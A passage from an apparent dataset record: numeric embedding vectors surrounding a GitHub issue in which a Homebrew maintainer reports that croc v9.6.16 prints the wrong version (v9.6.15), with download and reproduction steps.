-0.019480355083942413, -0.000723237288184464, -0.006189475767314434, 0.006732752546668053, 0.004152187146246433, 0.02789338491857052, -0.01730724796652794, -0.026837876066565514, 0.012798050418496132, -0.016360394656658173, 0.002039228565990925, 0.02008572220802307, 0.0044975560158491135, -0.002970560221001506, 0.002726085716858506, 0.02120331861078739, -0.005774256773293018, 0.012324623763561249, -0.00929003395140171, -0.0008037586812861264, -0.014001020230352879, 0.0012146118097007275, 0.024447457864880562, -0.01565413363277912, 0.006515441462397575, -0.006562008056789637, 0.0034478676971048117, -0.015677418559789658, -0.002489372156560421, -0.011633886024355888, 0.007062599062919617, 0.010904342867434025, 0.0033954803366214037, 0.004575167316943407, 0.013310282491147518, -0.013496548868715763, 0.0214516744017601, 0.007710650563240051, -0.015359212644398212, 0.012821333482861519, -0.000978868454694748, 0.016282783821225166, 0.004346214700490236, -0.0030927974730730057, 0.009802266955375671, -0.011827913112938404, -0.0037039839662611485, -0.0156929399818182, -0.012813572771847248, 0.007718411739915609, 0.005681123584508896, 0.009336601011455059, -0.009895400144159794, 0.008622580207884312, 0.010004054754972458, -0.000004627099770004861, -0.015064290724694729, -0.015297124162316322, -0.001715202583000064, -0.002450566738843918, 0.004710986278951168, 0.012417756952345371, 0.005436649080365896, 0.019868411123752594, 0.013659532181918621, 0.017974702641367912, 0.006891855038702488, 0.02044273167848587, 0.011626124382019043, 0.0230504609644413, -0.007912439294159412, 0.00015182647621259093, 0.009057201445102692, 0.024400891736149788, 0.01668636128306389, -0.019045734778046608, -0.0018849766347557306, 0.021637940779328346, 0.01721411570906639, -0.0008464447455480695, 0.014536536298692226, -0.01708993688225746, -0.004710986278951168, -0.016251739114522934, 0.0016773672541603446, -0.005657840520143509, 0.0025126554537564516, -0.011245830915868282, -0.010159277357161045, -0.030718425288796425, 0.007916320115327835, -0.011820152401924133, 0.010477482341229916, -0.012247011996805668, -0.003259661141782999, 0.02281762845814228, -0.0021672865841537714, 0.018114402890205383, 0.012464323081076145, -0.004101740196347237, -0.011711496859788895, 0.030982302501797676, 0.0070160324685275555, -0.005525901913642883, -0.024105969816446304, -0.004645016975700855, 0.026511911302804947, 0.022786583751440048, 0.006802602205425501, 0.012875661253929138, -0.01643800549209118, -0.0125885009765625, -0.004621733911335468, 0.001299013732932508, 0.007198418490588665, -0.0017423664685338736, 0.005945000797510147, -0.012728200294077396, 0.027691597118973732, -0.007520503830164671, -0.010446437634527683, 0.02879367396235466, 0.024509547278285027, 0.004082337487488985, -0.0019907215610146523, 0.004105620551854372, 0.016546661034226418, 0.014668474905192852, 0.01983736641705036, 0.01955796591937542, -0.007617517374455929, -0.027691597118973732, 0.017540080472826958, -0.007768859155476093, -0.001631770865060389, 0.0122780567035079, -0.009041679091751575, 0.011020759120583534, -0.007338118273764849, -0.02280210517346859, 0.0014066989533603191, 0.00451307836920023, -0.02193286269903183, -0.005587990395724773, 0.010943148285150528, -0.0013125956756994128, -0.0037175659090280533, 0.009763461537659168, -0.007679606322199106, -0.008405269123613834, 0.004404422827064991, -0.025984155014157295, 0.0026872800663113594, -0.0033062277361750603, 0.0010458079632371664, 0.0029201130382716656, -0.010306738317012787, 0.014629669487476349, 0.01671740412712097, 0.01708993688225746, -0.004431586712598801, 0.028933372348546982, -0.018890513107180595, 0.011882240884006023, -0.007528265006840229, 0.006562008056789637, 0.00116028415504843, 0.02055138722062111, 0.006515441462397575, 0.003368316451087594, 0.014451163820922375, -0.012122835032641888, 0.0019034092547371984, -0.012169401161372662, 0.0034110024571418762, 0.0009759580716490746, -0.018021268770098686, 0.006457233335822821, -0.02069108746945858, -0.005452171433717012, -0.011315681040287018, -0.004059054423123598, 0.0007537966594099998, -0.012541933916509151, -0.0033062277361750603, 0.011300158686935902, -0.008995112031698227, -0.0016531138680875301, 0.007493339944630861, -0.0019946021493524313, 0.01934065669775009, -0.004408303648233414, 0.005285307765007019, 0.0024660888593643904, 0.005832464899867773, 0.013271477073431015, -0.0361667163670063, 0.008444074541330338, 0.002351612551137805, -0.012541933916509151, -0.0013310282956808805, -0.010749120265245438, 0.004753672517836094, 0.002008184092119336, -0.02503730170428753, 0.012999839149415493, 0.0017171428771689534, -0.018781857565045357, -0.03560791537165642, -0.009266750887036324, 0.0027687717229127884, 0.01656218245625496, -0.015661895275115967, 0.00042831560131162405, -0.02404388040304184, -0.005343515891581774, 0.04175470769405365, -0.0018102760659530759, 0.01581711694598198, -0.017648736014962196, 0.02170003019273281, 0.0013397595612332225, -0.0022701211273670197, 0.015483390539884567, 0.005875151138752699, -0.021855251863598824, -0.014117437414824963, -0.004322931636124849, 0.00916585698723793, 0.012658351100981236, 0.017602169886231422, 0.008327658288180828, 0.014854741282761097, -0.024494023993611336, -0.002281762892380357, -0.025456400588154793, 0.003131602890789509, -0.005941120442003012, -0.0009274511830881238, 0.007893036119639874, 0.008490640670061111, 0.0016046069795265794, 0.02143615297973156, -0.005428887903690338, 0.014482208527624607, 0.01572398468852043, 0.001116627943702042, -0.004334573168307543, 0.016112038865685463, -0.00029249637736938894, 0.007660203613340855, -0.004412184003740549, -0.03874339908361435, 0.0027435480151325464, 0.0009274511830881238, 0.020504821091890335, -0.005211577285081148, 0.00972465518862009, -0.0021886297035962343, -0.005735451355576515, -0.030609769746661186, 0.013861320912837982, 0.016779493540525436, 0.03650820627808571, -0.0018752752803266048, -0.010384349152445793, 0.00042855812353082, 0.025021780282258987, 0.002012064680457115, -0.006232161540538073, 0.01794365793466568, 0.005615154281258583, -0.008878695778548717, -0.0079357223585248, 0.010252410545945168, 0.0043927812948822975, -0.014707280322909355, 0.005537543445825577, -0.007609756663441658, -0.03140140324831009, -0.011416574940085411, 0.008343180641531944, 0.029352473095059395, 0.0026853398885577917, -0.000391692912671715, -0.0011631945380941033, 0.006340817082673311, 0.005335754714906216, 0.0014358031330630183, -0.0007285730680450797, -0.0276605524122715, -0.002776532666757703, -0.00535903824493289, 0.01929408870637417, 0.00003816883690888062, 0.0012262534582987428, -0.007272148504853249, 0.0006165222148410976, 0.02044273167848587, 0.012091790325939655, 0.01755560375750065, 0.0052736662328243256, -0.008118108846247196, -0.009173617698252201, 0.02020989917218685, -0.005281426943838596, 0.0029511575121432543, 0.04141321778297424, 0.017353814095258713, -0.0013475206214934587, -0.008607057854533195, -0.0016152785392478108, 0.003052051644772291, -0.005999328568577766, 0.013481027446687222, -0.014598624780774117, 0.004000845830887556, -0.023531649261713028, -0.0004186142177786678, -0.005099041387438774, 0.008513924665749073, 0.011975374072790146, 0.0031122001819312572, -0.028607407584786415, 0.004800239112228155, 0.009096006862819195, -0.017120981588959694, -0.0245561134070158, -0.02665160968899727, 0.02992679364979267, -0.012720439583063126, 0.006410666741430759, 0.00847511924803257, 0.015630850568413734, -0.020768698304891586, -0.016282783821225166, 0.005188293755054474, 0.007151851896196604, 0.0062011172994971275, -0.015242796391248703, 0.013550876639783382, 0.003985323943197727, 0.011967613361775875, -0.010298976674675941, -0.004206514917314053, 0.011882240884006023, -0.010733597911894321, 0.005397843662649393, 0.006073059048503637, -0.007303193211555481, 0.00004756704220199026, 0.009996294043958187, 0.014761608093976974, -0.007927961647510529, -0.0015958757139742374, 0.0011098369723185897, -0.004047412425279617, 0.017912613227963448, -0.0049671027809381485, 0.01365177147090435, 0.018393801525235176, 0.0018859468400478363, 0.016344871371984482, 0.00011023184197256342, 0.01046972069889307, -0.026496388018131256, 0.01583264023065567, 0.01264282874763012, 0.008878695778548717, -0.008560490794479847, 0.013248194009065628, 0.0022448976524174213, -0.004334573168307543, -0.00707424059510231, 0.005347396247088909, -0.010190321132540703, -0.018021268770098686, 0.00884765200316906, 0.007470056880265474, 0.006833646912127733, 0.009786744602024555, -0.011921046301722527, 0.011657169088721275, 0.011346724815666676, 0.004749791696667671, 0.015436823479831219, 0.022507183253765106, 0.003593388246372342, -0.04271708428859711, -0.010283454321324825, 0.00029249637736938894, 0.02118779718875885, -0.006313653197139502, -0.0031160807702690363, -0.028498752042651176, -0.017788436263799667, 0.0029899629298597574, 0.04076128453016281, -0.019759755581617355, -0.007407967932522297, -0.021731074899435043, 0.0009230856085196137, -0.0018733349861577153, -0.010415392927825451, 0.02494416944682598, -0.019216477870941162, 0.02905755117535591, 0.019666621461510658, -0.0075166234746575356, 0.012006418779492378, 0.03529747202992439, 0.0072915516793727875, -0.005875151138752699, 0.02592206746339798, 0.007431250996887684, -0.00047779257874935865, -0.005844106897711754, 0.013178343884646893, -0.019418267533183098, 0.0064999195747077465, 0.006340817082673311, -0.002000422915443778, 0.0043694982305169106, 0.00241564167663455, -0.013799232430756092, -0.019868411123752594, 0.014032064937055111, -0.0004576622450258583, -0.011222547851502895, -0.0073575209826231, -0.02055138722062111, -0.007497220765799284, -0.014862501993775368, -0.007656323257833719, -0.005487096030265093, -0.00971689447760582, 0.013589682057499886, -0.040823373943567276, -0.0019363939063623548, -0.02193286269903183, 0.0014881904935464263, 0.0010749120265245438, -0.01164164673537016, 0.013186105526983738, -0.007555428892374039, -0.000008920715117710643, 0.009647044353187084, 0.0018199774203822017, 0.011005236767232418, -0.0005403664545156062, -0.00579365948215127, 0.0027028024196624756, 0.000640775659121573, -0.009049439802765846, 0.01365177147090435, 0.01882842369377613, -0.006562008056789637, 0.003269362496212125, 0.00666678324341774, -0.007927961647510529, 0.02168450690805912, -0.005099041387438774, -0.0001675912062637508, -0.010120471939444542, 0.0010623002890497446, 0.002468029037117958, 0.007815425284206867, 0.019232001155614853, -0.0006965585635043681, 0.0055724685080349445, 0.009220183826982975, 0.006926779635250568, 0.01670188270509243, 0.01707441546022892, 0.012557456269860268, -0.010756881907582283, -0.001701620756648481, 0.011602841317653656, -0.026620564982295036, -0.006969465874135494, 0.011874480172991753, -0.0034556288737803698, 0.0033430929761379957, -0.01730724796652794, 0.0037990573327988386, 0.00747393723577261, 0.017866047099232674, 0.012076267972588539, -0.0024175820872187614, -0.01632934994995594, -0.0011796868639066815, 0.012014179490506649, -0.02966291643679142, -0.0015638612676411867, -0.00782706681638956, 0.003026828169822693, -0.009647044353187084, 0.01943378895521164, -0.0199460219591856, 0.02081526443362236, 0.016857104375958443, -0.01620517298579216, 0.016143083572387695, 0.009934205561876297, 0.003618611954152584, 0.024882080033421516, -0.02879367396235466, 0.007850350812077522, 0.009173617698252201, 0.006853049620985985, -0.011028519831597805, -0.002714443951845169, -0.01955796591937542, -0.01483145821839571, -0.020396165549755096, -0.004873969592154026, -0.018874989822506905, 0.003077275352552533, 0.014365792274475098, 0.00779214221984148, -0.011137175373733044, -0.0035642841830849648, -0.011393291875720024, -0.00592171773314476, 0.00685692997649312, -0.029010983183979988, -0.007283790502697229, -0.007842589169740677, 0.0008464447455480695, 0.025177001953125, -0.005122324451804161, 0.05653183534741402, 0.026496388018131256, 0.014559819363057613, -0.0063873836770653725, 0.007089762948453426, 0.001069091260433197, 0.0030539920553565025, -0.011486425064504147, -0.031479012221097946, 0.011990896426141262, -0.016391439363360405, -0.010601659305393696, 0.004439347889274359, -0.0025708635803312063, -0.0005403664545156062, 0.0021110186353325844, 0.0048041194677352905, -0.012774767354130745, -0.019899455830454826, 0.0018907975172623992, -0.017136504873633385, -0.015824878588318825, 0.02031855471432209, 0.006018731277436018, 0.002580564934760332, 0.006643499713391066, 0.0101515157148242, 0.004827402997761965, 0.01477713044732809, -0.008762279525399208, 0.012091790325939655, 0.00303846993483603, -0.0053784409537911415, 0.01588696800172329, 0.004905013833194971, 0.01452101394534111, -0.0017860226798802614, 0.027629507705569267, -0.0033392123878002167, -0.002784293843433261, 0.009608238935470581, 0.011121653020381927, -0.009794505313038826, -0.007858111523091793, -0.011913285590708256, 0.004679942037910223, -0.004548003431409597, -0.023655826225876808, 0.012363429181277752, -0.00854496844112873, -0.014218331314623356, 0.021591374650597572, -0.0122780567035079, -0.005036952439695597, 0.019790800288319588, -0.003944578114897013, -0.014738325029611588, -0.0028987701516598463, 0.006724991369992495, 0.004183231852948666, -0.015801595523953438, 0.007667964790016413, -0.002450566738843918, 0.011509708128869534, -0.00533187435939908, 0.01052404846996069, 0.008273330517113209, 0.0020334075670689344, -0.015056530013680458, -0.011005236767232418, 0.004264723509550095, 0.004912775009870529, -0.0018549023661762476, 0.011137175373733044, -0.003709804732352495, -0.014590864069759846, 0.023609260097146034, -0.005735451355576515, -0.001606547273695469, 0.014039825648069382, -0.0024660888593643904, -0.012316862121224403, 0.0066861859522759914, -0.00816467497497797, -0.01420280896127224, -0.01858006790280342, 0.0014581162249669433, -0.006065297871828079, -0.005801420658826828, 0.02042721025645733, -0.024835513904690742, 0.021715551614761353, -0.01806783676147461, 0.008187958039343357, -0.007295432034879923, 0.004028009716421366, -0.0005811122246086597, 0.01993049867451191, 0.019030211493372917, 0.003952339291572571, -0.012316862121224403, -0.00470322510227561, -0.04110277444124222, 0.009437494911253452, -0.007004390936344862, -0.011874480172991753, -0.023003894835710526, -0.03144796937704086, -0.005653959698975086, -0.0026445940602570772, -0.013822515495121479, 0.014482208527624607, -0.01893707923591137, 0.0010846133809536695, -0.006302011664956808, 0.005052474793046713, 0.0006679394864477217, 0.01351207122206688, 0.0027435480151325464, 0.004827402997761965, 0.004648897796869278, -0.004187112208455801, -0.0028095173183828592, -0.0033430929761379957, -0.0008381985826417804, -0.018347235396504402, -0.0013387893559411168, 0.023267772048711777, -0.003733088029548526, 0.01414072047919035, 0.010198082774877548, -0.02008572220802307, 0.0215448085218668, 0.0034090622793883085, -0.0003094737767241895, 0.02056690864264965, 0.01396997645497322, -0.0029239936266094446, -0.0049903858453035355, 0.013007599860429764, -0.018254103139042854, 0.0466286763548851, -0.0026251913513988256, -0.006565888877958059, -0.0003385778982192278, -0.003094737883657217, -0.014109675772488117, -0.02056690864264965, -0.007411848288029432, -0.023888658732175827, 0.009965249337255955, -0.001870424603112042, 0.022351961582899094, 0.007648562081158161, -0.01532040722668171, 0.01584816165268421, -0.008009453304111958, 0.030563203617930412, -0.015421301126480103, 0.013861320912837982, -0.0035390607081353664, -0.002532058162614703, -0.01743142493069172, 0.03899175673723221, -0.001532816793769598, 0.010368826799094677, 0.020986009389162064, 0.001909230137243867, 0.01234014518558979, -0.010174799710512161, 0.0004792477993760258, 0.004101740196347237, 0.0059255980886518955, 0.002549520693719387, 0.01339565496891737, -0.0001508563436800614, -0.0023263890761882067, -0.008979590609669685, 0.02565819025039673, 0.02728801965713501, 0.012200445868074894, -0.024882080033421516, -0.02170003019273281, 0.0030113060493022203, -0.009018396027386189, 0.0013843858614563942, -0.007082001771777868, -0.012891183607280254, 0.0120995519682765, 0.02156032994389534, 0.007920200005173683, -0.015219513326883316, 0.0032713026739656925, -0.012014179490506649, -0.018238579854369164, -0.01327923871576786, 0.0075399065390229225, -0.023159116506576538, 0.0038805489894002676, -0.017369337379932404, -0.02058243192732334, -0.013550876639783382, -0.0003077760338783264, 0.01732277125120163 ]
null
null
null
null
null
null
null
null
null
[ "schollz", "croc" ]
Hello, part-time Homebrew core maintainer here, and noticed this when bumping the formula for `croc`: ## Describe the bug The new croc 9.6.16 version doesn't accurately report the version via `croc --version`: ``` ➜ croc_v9.6.16_macOS-ARM64 ./croc --version croc version v9.6.15 ``` ## To Reproduce Steps to reproduce the behavior: ``` $ cd /tmp $ curl -L https://github.com/schollz/croc/releases/download/v9.6.16/croc_v9.6.16_macOS-ARM64.tar.gz | tar -xzf - $ ./croc --version ``` ## Expected behaviour ``` croc version v9.6.16 ``` ## Version (not going to confuse things here :) ## Additional context <-- Add any other context about the problem here. -->
Version 9.6.16 reports 9.6.15 as version
https://api.github.com/repos/schollz/croc/issues/703/comments
2
2024-05-20T18:54:24
2024-05-21T10:48:12Z
https://github.com/schollz/croc/issues/703
2,306,575,688
703
false
This is a GitHub Issue repo:croc owner:schollz Title : Version 9.6.16 reports 9.6.15 as version Issue date: --- start body --- Hello, part-time Homebrew core maintainer here, and noticed this when bumping the formula for `croc`: ## Describe the bug The new croc 9.6.16 version doesn't accurately report the version via `croc --version`: ``` ➜ croc_v9.6.16_macOS-ARM64 ./croc --version croc version v9.6.15 ``` ## To Reproduce Steps to reproduce the behavior: ``` $ cd /tmp $ curl -L https://github.com/schollz/croc/releases/download/v9.6.16/croc_v9.6.16_macOS-ARM64.tar.gz | tar -xzf - $ ./croc --version ``` ## Expected behaviour ``` croc version v9.6.16 ``` ## Version (not going to confuse things here :) ## Additional context <-- Add any other context about the problem here. --> --- end body ---
844
[ -0.016146589070558548, -0.002040787832811475, -0.016008347272872925, 0.03550037741661072, 0.027385611087083817, 0.003106974298134446, 0.034836821258068085, 0.047499727457761765, 0.0002412743488093838, 0.057397808879613876, -0.003456033766269684, 0.022104792296886444, -0.0029929252341389656, -0.0014403020031750202, -0.03256966173648834, 0.04373956099152565, -0.029583647847175598, 0.00047347662621177733, 0.004008999094367027, -0.015593623742461205, -0.02616908773779869, -0.03140843287110329, 0.03162962198257446, 0.014985362067818642, 0.013782662339508533, -0.000008896587132767309, -0.012503929436206818, 0.0065733762457966805, -0.014390924014151096, 0.0028114833403378725, -0.0009573213174007833, 0.02202184684574604, -0.0038189173210412264, 0.011550064198672771, 0.06541580706834793, 0.008743764832615852, -0.008729941211640835, 0.028422420844435692, 0.01994822733104229, -0.012960126623511314, -0.05181285738945007, -0.027482379227876663, -0.006687425076961517, 0.015579800121486187, -0.0019319228595122695, -0.012531578540802002, -0.003549346700310707, 0.028837144374847412, -0.004551596473902464, 0.026362625882029533, 0.005913273431360722, -0.0253396388143301, -0.029998373240232468, -0.02000352367758751, 0.01065149623900652, -0.03514095023274422, 0.02521522156894207, -0.006072251126170158, -0.008716116659343243, -0.021178575232625008, -0.027662092819809914, 0.0431036539375782, -0.006815298460423946, 0.016063645482063293, 0.008577875792980194, 0.04487314075231552, -0.05360999330878258, 0.02018323726952076, 0.030081316828727722, 0.0198376327753067, 0.026252031326293945, 0.012863357551395893, 0.06967364251613617, 0.016948388889431953, 0.05493711307644844, -0.0059547461569309235, 0.03248671814799309, 0.01798519864678383, -0.027662092819809914, -0.0021824853029102087, -0.04351837560534477, 0.00955938920378685, 0.0027181704062968493, -0.0012986046494916081, 0.018869943916797638, -0.015234196558594704, 0.00522552290931344, -0.0571766197681427, -0.02662528306245804, -0.0011422191746532917, -0.0031501746270805597, 0.023749863728880882, 0.027551500126719475, -0.013015422970056534, -0.012801148928701878, 0.030689578503370285, -0.03632982447743416, -0.001270092325285077, -0.023708391934633255, -0.04841211810708046, -0.012863357551395893, -0.057508401572704315, 0.018275506794452667, -0.028270356357097626, 0.006514623295515776, 0.017846958711743355, -0.0144738694652915, -0.011474031955003738, -0.0175842996686697, 0.07901875674724579, 0.027786510065197945, -0.013181312941014767, -0.05587715283036232, -0.02663910761475563, -0.03505800664424896, 0.01506830658763647, 0.013098367489874363, 0.017902255058288574, -0.06541580706834793, 0.02692941389977932, -0.027510028332471848, -0.029196573421359062, -0.0172248724848032, 0.00652499170973897, -0.023583974689245224, 0.010105442255735397, -0.006863682996481657, -0.003780900966376066, -0.0019284668378531933, -0.034117963165044785, 0.0031519026961177588, 0.0038569336757063866, -0.008439633995294571, -0.005871801171451807, -0.017266344279050827, -0.0382375568151474, 0.015524503774940968, 0.06646644324064255, -0.025436408817768097, -0.006459326948970556, -0.019312316551804543, -0.0530293807387352, 0.05811666324734688, 0.017681067809462547, 0.0030032931827008724, -0.008446546271443367, 0.03248671814799309, 0.0009296730859205127, -0.029804835096001625, -0.004136872477829456, -0.005840696860104799, -0.023113952949643135, 0.0499604232609272, 0.019865281879901886, 0.021690066903829575, -0.04752737656235695, 0.017017509788274765, 0.006110267713665962, 0.01651984080672264, -0.010824297554790974, 0.0005188370705582201, -0.0007573033799417317, 0.024938739836215973, -0.02900303527712822, 0.002538456814363599, -0.012953214347362518, -0.010485606268048286, 0.012773500755429268, 0.0020183236338198185, 0.004506668075919151, 0.006545727606862783, 0.04020058363676071, -0.007492681033909321, 0.028671255335211754, -0.016118941828608513, 0.024067819118499756, 0.014183562248945236, -0.015994524583220482, 0.01151550468057394, -0.018662581220269203, -0.009296730160713196, 0.008280656300485134, -0.03713162615895271, -0.04150005429983139, 0.02402634546160698, -0.06043911725282669, 0.016008347272872925, 0.017058981582522392, -0.029030682519078255, -0.028339475393295288, 0.016879267990589142, -0.02384663186967373, 0.011888755485415459, -0.03533449023962021, 0.005975482054054737, 0.03320557251572609, 0.0016735843382775784, 0.0032141113188117743, 0.0008778325282037258, 0.04266127943992615, 0.024814322590827942, -0.010900329798460007, -0.01958879828453064, -0.009863520041108131, -0.015441558323800564, -0.006590656470507383, -0.007105605211108923, 0.03035780042409897, 0.028837144374847412, -0.04932451248168945, -0.012711292132735252, -0.043960750102996826, -0.011321966536343098, 0.007976525463163853, -0.005671351216733456, 0.005512373521924019, 0.02112327702343464, 0.01193022821098566, -0.022450394928455353, -0.011847283691167831, 0.02236744947731495, -0.018538163974881172, 0.008778325282037258, -0.01645071990787983, -0.010319716297090054, 0.01462593488395214, 0.018206385895609856, 0.008771413937211037, -0.04125121980905533, -0.0032244795002043247, 0.024302829056978226, -0.009365851059556007, -0.02847771719098091, 0.05385882779955864, -0.021220047026872635, 0.0033938251435756683, -0.007865932770073414, 0.013948552310466766, -0.015635095536708832, -0.0018386099254712462, 0.020044995471835136, 0.04025588184595108, 0.02384663186967373, -0.0653052106499672, -0.005951290018856525, -0.027302665635943413, 0.021344464272260666, -0.02178683690726757, -0.03295673802495003, 0.026376448571681976, 0.007686218712478876, -0.03295673802495003, 0.004931760020554066, 0.008937302976846695, 0.013167488388717175, 0.01468123123049736, 0.010402661748230457, 0.013367937877774239, -0.0031017903238534927, -0.008958038873970509, -0.014100617729127407, 0.005622966680675745, -0.041472405195236206, 0.0396752655506134, 0.02486961893737316, -0.011294318363070488, -0.02515992522239685, -0.005650614853948355, -0.008964951150119305, -0.007534153293818235, 0.041942425072193146, -0.011073132045567036, -0.012123766355216503, 0.02386045642197132, -0.02225685678422451, -0.022989535704255104, 0.034311503171920776, 0.004143784288316965, 0.0008493202622048557, 0.007188550196588039, 0.003932966385036707, 0.06231920048594475, -0.0011759154731407762, 0.015704216435551643, 0.01491624116897583, 0.04415428638458252, 0.001068778452463448, -0.018220210447907448, -0.019215546548366547, 0.015026834793388844, 0.025242870673537254, 0.00363229145295918, 0.02177301235496998, 0.012372600845992565, -0.027606796473264694, 0.008273744955658913, -0.02611379139125347, 0.05654071271419525, -0.004579244647175074, -0.011819635517895222, -0.0006022138986736536, 0.007561801932752132, -0.009759838692843914, -0.0021548368968069553, 0.03638512268662453, 0.029611296951770782, 0.03160197287797928, 0.022713053971529007, -0.010409573093056679, 0.038624633103609085, 0.008073294535279274, -0.023514853790402412, -0.043407782912254333, -0.019602622836828232, -0.0166857298463583, -0.01065840758383274, 0.025007858872413635, 0.004060839768499136, -0.024219883605837822, 0.0077899000607430935, -0.018607284873723984, 0.010457958094775677, -0.03196140006184578, -0.012655995786190033, 0.02847771719098091, 0.02545023150742054, -0.044596657156944275, -0.010409573093056679, -0.03218258544802666, 0.012414072640240192, -0.010375013574957848, -0.004358058329671621, 0.007534153293818235, -0.0017591211944818497, 0.009676894173026085, -0.019339963793754578, 0.01574569009244442, -0.015303317457437515, -0.01587010733783245, 0.0022274137008935213, -0.019284667447209358, 0.014404748566448689, 0.01130122970789671, 0.025947900488972664, -0.019132602959871292, -0.06215330958366394, 0.01728016883134842, -0.0037636207416653633, 0.020750027149915695, -0.015386261977255344, 0.0009530012612231076, 0.010043233633041382, 0.03259731084108353, -0.027482379227876663, -0.004454827401787043, -0.019574975594878197, 0.00020595801470335573, -0.037491053342819214, 0.05156402289867401, 0.01834462769329548, 0.00884744618088007, -0.060107339173555374, 0.018192561343312263, 0.019284667447209358, 0.01792990230023861, 0.0006372061907313764, -0.023722214624285698, 0.004413355141878128, 0.006455870810896158, -0.03425620496273041, -0.015911579132080078, -0.00039765986730344594, -0.05817195773124695, 0.04343543201684952, 0.01628483086824417, -0.013132927939295769, -0.0033765449188649654, 0.04686381667852402, -0.009075544774532318, 0.019091129302978516, -0.00754797738045454, -0.003300512209534645, 0.03591510280966759, -0.020031170919537544, -0.02786945551633835, -0.02005882002413273, 0.011646833270788193, 0.037491053342819214, -0.0020563399884849787, 0.01083120983093977, -0.025643769651651382, -0.03652336448431015, 0.014902417548000813, 0.003260767785832286, 0.003136350540444255, 0.0014204297913238406, -0.005674807354807854, -0.022975711151957512, -0.01859346032142639, 0.019450558349490166, 0.013837958686053753, -0.0014523981371894479, 0.01657513715326786, -0.025464056059718132, 0.02184213325381279, -0.0059305536560714245, -0.03168491646647453, -0.033122625201940536, 0.004119592253118753, 0.03339910879731178, 0.024109290912747383, 0.019975874572992325, -0.00887509435415268, 0.020985037088394165, 0.00736826378852129, 0.009130841121077538, 0.002630041679367423, -0.008211536332964897, -0.050928112119436264, 0.02663910761475563, 0.013976200483739376, -0.033177923411130905, -0.007582537829875946, 0.04747207835316658, 0.026556162163615227, 0.009165401570498943, -0.04940745607018471, 0.015123603865504265, 0.02770356647670269, 0.02083297073841095, -0.01470887940376997, -0.017128102481365204, 0.043407782912254333, 0.008985687978565693, 0.00010000897600548342, -0.01834462769329548, -0.06265097856521606, -0.036799848079681396, 0.02113710157573223, -0.044126637279987335, -0.032707903534173965, 0.007033028639853001, -0.01450151763856411, -0.003333344589918852, -0.017072806134819984, 0.027454731985926628, -0.050706926733255386, -0.030468393117189407, -0.03162962198257446, -0.02514610067009926, 0.013036158867180347, 0.06342513114213943, 0.01852434128522873, 0.012607610784471035, 0.0038120050448924303, -0.030108965933322906, 0.008916567079722881, -0.0007486633257940412, 0.04091943800449371, 0.025726715102791786, 0.001049770275130868, -0.029196573421359062, -0.011356526985764503, -0.015206548385322094, -0.008709205314517021, 0.04633849859237671, 0.017556650564074516, -0.04586847871541977, -0.021510353311896324, 0.0018109616357833147, -0.004112679976969957, 0.0005097649409435689, -0.013043071143329144, 0.005025072954595089, -0.023763688281178474, 0.025408759713172913, -0.006296893581748009, 0.0034024652559310198, 0.03594275191426277, -0.026182910427451134, 0.00940732378512621, -0.033482056111097336, 0.007955789566040039, 0.03143608197569847, -0.020017346367239952, -0.03558332100510597, -0.025367287918925285, -0.008951127529144287, -0.04368426650762558, 0.019132602959871292, -0.010630759410560131, -0.0086124362424016, 0.03527919203042984, 0.0016891364939510822, 0.029556000605225563, -0.0035942750982940197, 0.017238695174455643, 0.014570637606084347, 0.04105767980217934, 0.004997424781322479, -0.0014532621717080474, -0.018151089549064636, 0.008633172139525414, -0.03334381431341171, -0.0033886409364640713, -0.0017254247795790434, 0.01929849199950695, 0.027745038270950317, 0.015165075659751892, 0.022754525765776634, -0.005633335094898939, 0.020169412717223167, -0.008681556209921837, 0.0014584462624043226, 0.0004898927873000503, -0.011978613212704659, 0.030855469405651093, -0.024316653609275818, 0.03870757669210434, 0.006632128730416298, -0.0009460892179049551, -0.019339963793754578, 0.0021306448616087437, -0.013160576112568378, -0.017155751585960388, -0.00022637020447291434, 0.0071470774710178375, -0.009974113665521145, 0.06845711171627045, -0.04517727345228195, 0.020224709063768387, -0.010416485369205475, 0.014805648475885391, 0.025782011449337006, 0.008958038873970509, 0.016768675297498703, 0.006276157218962908, -0.00908245611935854, -0.028215058147907257, -0.00009336690709460527, 0.02018323726952076, 0.010112354531884193, -0.02734413929283619, -0.002562649082392454, -0.03948172926902771, 0.015358613803982735, -0.00162433588411659, 0.04014528915286064, 0.027745038270950317, -0.009835871867835522, -0.016022171825170517, -0.01834462769329548, 0.015704216435551643, 0.01751517876982689, 0.009068632498383522, 0.03268025442957878, 0.019215546548366547, -0.01669955439865589, 0.03995174914598465, 0.008356689475476742, -0.00004031139178550802, 0.04429252818226814, 0.006946627516299486, 0.00009363691060571, -0.015151252038776875, -0.015082131139934063, 0.005305011756718159, -0.004752046428620815, -0.033482056111097336, -0.022284505888819695, 0.006950083654373884, 0.024012522771954536, 0.02261628396809101, -0.015026834793388844, -0.013416322879493237, 0.03160197287797928, -0.006296893581748009, 0.00261276145465672, -0.018220210447907448, -0.00940732378512621, 0.0005749976262450218, -0.0062830690294504166, -0.018911415711045265, -0.003437025472521782, -0.009365851059556007, -0.00723693473264575, -0.0030482218135148287, 0.0011862835381180048, -0.026127614080905914, -0.027537675574421883, -0.00033458726829849184, 0.01710045523941517, -0.013457795605063438, -0.017611946910619736, 0.009469532407820225, -0.01452916581183672, -0.03685514256358147, 0.02189742960035801, 0.04326954111456871, 0.013001598417758942, 0.03934348747134209, -0.028256531804800034, 0.0007681034621782601, -0.003881125943735242, -0.007216198369860649, 0.00257474509999156, -0.020625609904527664, 0.03165726736187935, -0.0037497966550290585, 0.010160738602280617, -0.019022010266780853, -0.010167650878429413, 0.06657703220844269, -0.00808020681142807, 0.018966712057590485, 0.0048453593626618385, 0.006103355437517166, 0.005972026381641626, 0.011563888750970364, -0.007755339611321688, 0.0478038564324379, -0.01180581096559763, -0.019077306613326073, 0.0032711359672248363, -0.01574569009244442, 0.025353463366627693, -0.00423364108428359, 0.005242803134024143, 0.013105279766023159, -0.009234522469341755, -0.059277888387441635, 0.009898080490529537, 0.009987937286496162, -0.009828959591686726, -0.03140843287110329, 0.03124254383146763, 0.015261844731867313, -0.0015794073697179556, -0.030081316828727722, -0.04050471633672714, -0.010589287616312504, 0.0017072806367650628, 0.03436679765582085, 0.024454893544316292, -0.01780548505485058, 0.013824135065078735, 0.023238370195031166, 0.004983600694686174, -0.0012407160829752684, 0.0017228327924385667, -0.031270191073417664, -0.0008437042124569416, -0.05114929750561714, 0.022740701213479042, -0.006082619074732065, 0.005266995169222355, 0.023238370195031166, 0.03713162615895271, -0.03268025442957878, -0.02362544648349285, -0.010748264379799366, -0.04213596135377884, -0.004900655709207058, -0.002806299366056919, 